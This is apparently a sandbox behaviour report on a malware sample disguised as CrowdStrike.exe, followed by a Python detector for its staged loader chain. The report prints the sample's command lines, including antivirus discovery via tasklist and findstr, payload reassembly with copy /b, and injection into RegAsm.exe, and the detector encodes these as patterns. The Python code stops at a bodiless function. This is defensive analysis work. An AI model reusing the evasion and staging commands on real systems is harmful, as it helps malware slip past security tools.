        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
        Source: CrowdStrike.exe | Static PE information: real checksum: 0x133016 should be: 0x61a253

        Persistence and Installation Behavior

        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | File created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Process information set: NOOPENFILEERRORBOX (12 identical entries)
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 identical entries)
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Process information set: NOOPENFILEERRORBOX (2 identical entries)
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (44 identical entries)

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\CrowdStrike.exe | Stalling execution: Execution stalls by calling Sleep (graph_0-3897)
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: CF0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 26E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 2620000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 77E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 87E0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 8AA0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 9AA0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 9E10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: AE10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: BE10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: CE10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: DE10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: EE10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: F4F0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 104F0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 114F0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Memory allocated: 124F0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 600000
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599890
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599781
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599671
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599562
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599453
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599343
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599234
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599125
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599015
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598906
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598797
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598687
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598578
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598455
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598328
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598218
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598109
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597999
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597889
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597777
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597656
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597520
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597234
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597060
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 596937
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 596827
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599875
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599765
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599648
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599546
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599437
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599286
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599171
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599062
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598953
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598843
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598734
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598623
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598515
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598403
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598093
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597966
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597859
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597743
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597640
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597531
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597421
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597312
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597203
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597093
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Window / User API: threadDelayed 3716
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Window / User API: threadDelayed 6040
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\OpenFileFinder.dll
        Source: C:\Windows\SysWOW64\timeout.exe TID: 7592 | Thread sleep count: 130 > 30
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -23980767295822402s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -600000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599890s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599781s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599671s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599562s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599453s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599343s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599234s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599125s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599015s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598906s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598797s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598687s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598578s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598455s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598328s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598218s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598109s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597999s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597889s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597777s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597656s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597520s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597234s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597060s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -596937s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -596827s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599875s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599765s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599648s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599546s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599437s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599286s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599171s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -599062s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598953s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598843s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598734s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598623s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598515s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598403s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -598093s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597966s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597859s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597743s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597640s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597531s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597421s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597312s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597203s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320 | Thread sleep time: -597093s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File Volume queried: C:\ FullSizeInformation (2 identical entries)
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00402E18 FindFirstFileW
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 600000
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599890
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599781
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599671
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599562
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599453
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599343
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599234
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599125
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 599015
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598906
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598797
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598687
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598578
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598455
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598328
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598218
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 598109
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597999
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597889
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597777
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597656
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597520
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Thread delayed: delay time: 597234
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597060Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596937Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596827Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599648Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599286Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599171Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599062Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598953Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598843Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598734Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598623Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598515Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598403Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597966Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597859Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597743Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597421Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif Memory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif Memory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 700000
Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif Memory written: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe base: 4DE000
Source: C:\Users\user\Desktop\CrowdStrike.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\L
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif Process created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
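The process chain listed above (a batch stage that pipes tasklist into findstr for security-product names, strips a junk line from the payload with findstr /V, reassembles it with copy /b, runs a renamed AutoIt interpreter as a .pif from %TEMP%, and finally launches an argument-less copy of RegAsm.exe as the injection target) can be recognised from ordinary process-creation telemetry. The following Python is an added example written for this page, not Joe Sandbox or Sigma code: the events are constructed from the command lines above with invented PIDs, and the indicator names are the example's own vocabulary.

```python
"""Detect the staged loader chain from process-creation telemetry.
Added example for this page; not Joe Sandbox or Sigma code."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Security products the batch stage greps for, copied from the two findstr command lines above.
AV_PROCESS_NAMES = {
    "wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
    "bdservicehost.exe", "nswscsvc.exe", "sophoshealth.exe",
}
# A process (with its direct children) must show all three before it is reported as the chain.
REQUIRED_CHAIN = {"security_software_discovery", "fragment_reassembly", "pif_from_temp"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon event 1 or 4688 provide)."""
    pid: int
    ppid: int
    image: str
    command_line: str


def av_names_in(command_line: str) -> set[str]:
    """Known AV/EDR process names mentioned on a command line."""
    names = set(re.findall(r"[\w.-]+\.exe", command_line.lower()))
    return names & AV_PROCESS_NAMES


def findings_for(ev: ProcEvent) -> set[str]:
    """Indicator names (this example's own vocabulary) raised by one event."""
    image, cl = ev.image.lower(), ev.command_line.lower()
    found = set()
    if image.endswith("\\findstr.exe") and av_names_in(cl):
        found.add("security_software_discovery")          # tasklist | findstr /I "<AV names>"
    if image.endswith("\\cmd.exe") and re.search(r"\bcopy\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd\b", cl):
        found.add("extensionless_batch_rename")           # copy Carroll Carroll.cmd & Carroll.cmd
    if image.endswith("\\cmd.exe") and re.search(r"\bcopy\s+/b\s+\S+(?:\s*\+\s*\S+)+\s+\S+", cl):
        found.add("fragment_reassembly")                  # copy /b A + B + C + ... target
    if image.endswith(".pif") and "\\appdata\\local\\temp\\" in image:
        found.add("pif_from_temp")                        # renamed AutoIt interpreter run from %TEMP%
    if (re.fullmatch(r'"?[^"]*\\regasm\.exe"?\s*', cl)
            and not image.startswith("c:\\windows\\microsoft.net\\")):
        found.add("regasm_copy_no_args")                  # RegAsm.exe copied out of the framework dir, no assembly argument
    return found


def chain_findings(events) -> dict[int, set[str]]:
    """Each PID's own indicators merged with those of its direct children."""
    agg: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        f = findings_for(ev)
        if f:
            agg[ev.pid] |= f
            agg[ev.ppid] |= f
    return dict(agg)


def suspicious_chains(events) -> list[int]:
    """PIDs (the batch interpreter, in this sample) whose subtree shows the whole chain."""
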